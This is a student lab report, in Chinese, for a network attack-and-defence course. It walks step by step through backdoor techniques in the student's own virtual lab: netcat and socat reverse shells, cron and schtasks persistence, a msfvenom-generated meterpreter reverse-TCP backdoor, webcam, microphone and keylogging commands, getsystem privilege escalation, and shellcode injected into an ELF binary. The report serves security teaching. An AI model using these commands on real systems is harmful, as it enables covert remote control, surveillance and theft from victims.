20222311 2024-2025-1 《网络与系统攻防技术》实验二实验报告

一、实验内容

1.实验目标
(1)使用netcat获取主机操作Shell，cron启动某项任务（任务自定）

PS：cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter（或其他软件）生成可执行文件（后门），利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容的后门，并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

2.问题回答

• 例举你能想到的一个后门进入到你系统中的可能方式？
  （1）下载来源不可靠的文件；
  （2）访问受感染的网站或社交媒体链接；
  （3）插入不明来源的U盘；
  （4）在钓鱼网站上点击不安全的链接。
• 例举你知道的后门如何启动起来(win及linux)的方式？
  （1）在Windows系统中：利用windows启动项启动后门、利用windows服务启动后门、利用定时任务启动后门等；
  （2）在Linux系统中：利用cron或at等定时任务工具启动后门、利用自启动脚本启动后门、利用利用SSH隧道启动后门、利用反弹Shell启动后门等。
• Meterpreter有哪些给你映像深刻的功能？
  能获得目标主机的shell、摄像头和麦克风权限、进行截屏并获得键盘记录等，能够窃取大量的隐私数据，网络防护工作真是任重道远。
• 如何发现自己有系统有没有被安装后门？
  （1）使用杀毒软件进行全盘杀毒扫描；
  （2）使用cmd查看是否有可疑IP在进行外网链接；
  （3）检查系统日志的系统和安全部分，检查是否有可疑程序。

二、实验过程
1．使用netcat获取主机操作Shell，cron启动某项任务
（1）查看主机的ip
首先关闭主机和虚拟机的防火墙，在windows主机上下载ncat程序，并打开cmd，输入ipconfig指令查看主机的IP地址：

（2）使用netcat进行连接并获取shell

• 虚拟机登入root用户（后续操作需要使用root权限），主机cmd进入ncat所在目录。
• Win主机输入指令：ncat.exe -l -p 2311（l表示listen，“监听”；p表示port，指定端口，端口号可自行指定）
• Linux虚机输入指令：nc 172.16.178.98 2311 -e /bin/sh（nc即netcat，后面的参数是要连接的ip和port，-e是指定连接后运行的程序，本例中就是shell。）
  
  win主机输入ls，若能够正常显示虚拟机下文件名，证明主机已成功获取虚拟机shell。
  （3）通过设置cron使得kali启动定时任务。
• cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。注意：windows不能直接使用crontab -e远程编辑，会报错；
• 我们这里进入虚拟机的虚拟机的root账户，输入crontab -e （执行文字编辑器来设定时程表），选择的是2：/usr/bin/vim.basic；
  
• 输入后进入文字编辑器，输入指令30 * * * * /bin/netcat 192.168.31.233 8888 -e /bin/sh （输入自己主机的IP地址，在每小时的第30分钟启动任务）
  
• 编辑好后退出文字编辑器，输入crontab -l查看时程表：
  
• 同时在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件。
  
• 现在回到Windows主机的cmd中进行操作，还是一样与Linux建立连接之后，切换到root模式，输入:
  echo "* * * * * echo "20222311" > /home/wshkali/2311_1.txt" > /var/spool/cron/crontabs/root（每分钟定时执行一次，用“20222311”覆盖文件2311_1.txt）
• crontab -l （检查时程表）
  
  进入Linux虚拟机进入对应路径检查2311_1.txt文件，发现修改成功。
  
  2． 使用socat获取主机操作Shell，任务计划启动
• Socat与netcat类似，但比起netcat，socat功能更多，比如如建立ssl连接。
• windows主机：下载socat，cmd进入socat文件夹，输入命令：
  socat.exe tcp-listen:2311 exec:cmd.exe,pty,stderr（把cmd.exe绑定到端口2311，并把cmd.exe的stderr重定向到stdout）
• Linux虚拟机：进入root用户，输入命令：
  socat - tcp:192.168.1.110:2311
  
  
• 回到主机，我们需要事先准备一个程序以供运行，在此省略程序编写环节
  
• 在Linux上启用Windows的程序，通过命令行创建任务计划，在shell里输入命令：schtasks /create /sc minute /mo 1 /tn "20222311" /tr C:\Users\Petrichor\Desktop\20222311.exe每一分钟执行一次我写的这个程序：）
• 回到windows主机，打开计算机管理，看到正在运行的任务名“20222311”，说明实验成功。
  

3.在Linux下使用MSF meterpreter生成可执行文件，利用ncat或socat传送到Windows主机并运行获取主机shell

• 保证windows的实时保护处于关闭状态，同时关闭防火墙进行实验。

（1）生成后门文件

• 首先在kali中输入ifconfig，获得虚拟机的IP地址：
  
• 虚拟机的IP地址是192.168.1.111
• 继续中输入以下命令：
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=2311 -f exe > 2311backdoor.exe（使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload，并将其保存到一个可执行文件中。）
• LHOST=192.168.1.111是shell 连接的主机 IP 地址，在本实验中是虚拟机的IP地址；
• LPORT=2311是攻击者的系统上监听的端口号；
• -f exe指定了生成的 payload 的格式，这里是exe；
• 2311backdoor.exe即生成的恶意可执行文件（名称自拟）
  

（2）将后门文件传输至目标主机

• 主机进入ncat所在目录下，输入指令：
  ncat.exe -lv 2311 > "C:\Users\Petrichor\Desktop\2311backdoor.exe"（监听2311窗口等待接收可执行文件2311backdoor.exe，并将2311backdoor.exe文件存放在桌面上）
  
• 虚拟机上输入指令：
  nc 192.168.1.110 2311 < 2311backdoor.exe（将生成的后门文件2311backdoor.exe传给主机）
• Win主机接收到后门文件2221backdoor.exe，成功在桌面找到文件
  

（3）配置监听模块

• 回到虚拟机，在Kali终端输入命令msfconsole，然后对监听模块进行配置：
  
• use exploit/multi/handler（使用监听模块，设置payload）
• set payload windows/meterpreter/reverse_tcp （使用和生成后门程序时相同的payload）
• set LHOST 192.168.1.111 （攻击机的IP地址，和生成后门程序时指定的IP相同）
• set LPORT 2311（监听的端口）
  
• 接着输入exploit，使监听模块开始运行，并在Windows终端运行后门2311backdoor.exe文件
  
  
• 返回检查虚拟机，输入ls查看windows主机目录，确认已经连接。
  

4.使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
（1）获取目标主机音频、截屏、摄像头、键盘记录

• 在exploit模块中继续输入以下命令：
  record_mic　　 （音频）
  screenshot　　 （截屏）
  webcam_snap （拍照）
  keyscan_start （开始读取键盘记录）
  keyscan_dump （读取键盘记录结束）
  
  
  
• 音频截屏和拍照被保存在root文档中，键盘记录的字符串将直接显示在命令栏上
  

（2）提权

• 确保windows的cmd指令是使用管理员身份运行的，继续在exploit模块中继续输入：
  getuid （查看当前用户）
  getsystem （提权指令）
  

5．使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

• 在kali命令行下输入：
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.111
  LPORT=2311 -x /home/wshkali/Desktop/pwn20222311-1 -f elf > 20222311_pwn
  （使用了msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload，并将其注入到指定的可执行文件中，然后将结果输出到一个名为 20222311_pwn的文件中。）
  
• 对生成的20222311_pwn文件赋予权限：
  
• 输入指令msfconsole，重现监听过程：
  
  
• 打开另一个shell，运行生成的20222311_pwn文件（需要使用root权限）
  
• 回到第一个shell，输入ls确认连接，成功实现远程控制shell
  

三、实验中遇到的问题及解决办法

• 问题1：在使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell时，我用root权限输入输入：
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.111
  LPORT=2311 -x /home/wshkali/Desktop/pwn20222311-1 -f elf > 20222311_pwn
  这个代码，其生成的20222311_pwn文件在root文件夹中，导致我后续打开这个文件的操作报错。
  解决方法：我重新在kali命令行下运行了这个代码，实验得以成功
• 问题2：一开始我在window上使用nc -l -p 2311这个代码报错
  
  解决方法：我改进了代码，使用ncat.exe -l -p 2311得以成功运行
• 问题3：socat实验中在Windows机cmd端schtasks /create /sc minute /mo 1 /tn "20222311" /tr C:\Users\Petrichor\Desktop\20222311.exe运行错误
  解决方法：格式错误，每个指令（如/create，/mo 1等）前都需要附带空格键。修改后得以成功

四、实验体会

• 在这次网络安全实验中，我深刻体会到了网络安全的重要性和复杂性。通过实践，我学习了Linux下的cron作业调度器，这让我了解到了如何自动化执行日常任务，比如定期备份数据和更新系统。这种自动化不仅提高了效率，也增强了系统的安全性。
• 我还学习了netcat和socat这两个网络工具的使用，它们在网络通信和调试中扮演着重要角色。通过这些工具，我能够更好地理解网络数据的传输和处理过程，这对于维护网络的稳定性和安全性至关重要。
• 此外，通过模拟恶意软件的分析和防御，我提高了对潜在网络威胁的认识。我学会了如何使用各种工具来检测和防御这些威胁，这对于保护我们的数字资产至关重要。
• 最后，通过学习缓冲区溢出和Shellcode的注入，我更加明白了这些高级攻击手段的工作原理。虽然这些技术在网络安全领域有着重要的应用，但它们也应该被用于防御，而不是攻击。
• 总的来说，这次实验不仅提高了我的技术技能，也加深了我对网络安全重要性的理解。我认识到，作为一名网络空间安全专业的学生，我们有责任使用这些技能来保护网络环境，而不是滥用它们。网络安全是一个不断发展的领域，我们需要不断学习和适应新的威胁和挑战。